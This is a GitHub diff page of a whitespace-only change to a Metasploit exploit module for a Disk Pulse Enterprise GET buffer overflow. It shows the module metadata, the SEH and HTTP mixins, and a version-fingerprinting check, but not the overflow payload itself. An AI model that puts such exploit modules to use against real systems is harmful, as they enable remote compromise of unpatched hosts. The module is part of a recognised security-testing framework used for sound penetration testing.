File tree Expand file tree Collapse file tree 1 file changed +11
-11
lines changed
modules/exploits/windows/http Expand file tree Collapse file tree 1 file changed +11
-11
lines changed Original file line number Diff line number Diff line change 2
2
# This module requires Metasploit: http://metasploit.com/download
3
3
# Current source: https://github.com/rapid7/metasploit-framework
4
4
##
5
-
5
+
6
6
require 'msf/core'
7
-
7
+
8
8
class MetasploitModule < Msf ::Exploit ::Remote
9
9
Rank = ExcellentRanking
10
-
10
+
11
11
include Msf ::Exploit ::Remote ::HttpClient
12
12
include Msf ::Exploit ::Remote ::Seh
13
-
13
+
14
14
def initialize ( info = { } )
15
15
super ( update_info ( info ,
16
16
'Name' => 'Disk Pulse Enterprise GET Buffer Overflow' ,
@@ -52,24 +52,24 @@ def initialize(info = {})
52
52
'Privileged' => true ,
53
53
'DisclosureDate' => 'Aug 25 2017' ,
54
54
'DefaultTarget' => 0 ) )
55
-
55
+
56
56
register_options ( [ Opt ::RPORT ( 80 ) ] , self . class )
57
-
57
+
58
58
end
59
-
59
+
60
60
def check
61
61
res = send_request_cgi ( {
62
62
'uri' => '/' ,
63
63
'method' => 'GET'
64
64
} )
65
-
65
+
66
66
if res and res . code == 200 and res . body =~ /Disk Pulse Enterprise v9\. 9\. 16/
67
67
return Exploit ::CheckCode ::Appears
68
68
end
69
-
69
+
70
70
return Exploit ::CheckCode ::Safe
71
71
end
72
-
72
+
73
73
def exploit
74
74
connect
75
75
@@ -94,4 +94,4 @@ def exploit
94
94
disconnect
95
95
96
96
end
97
- end
97
+ end
You can’t perform that action at this time.
0 commit comments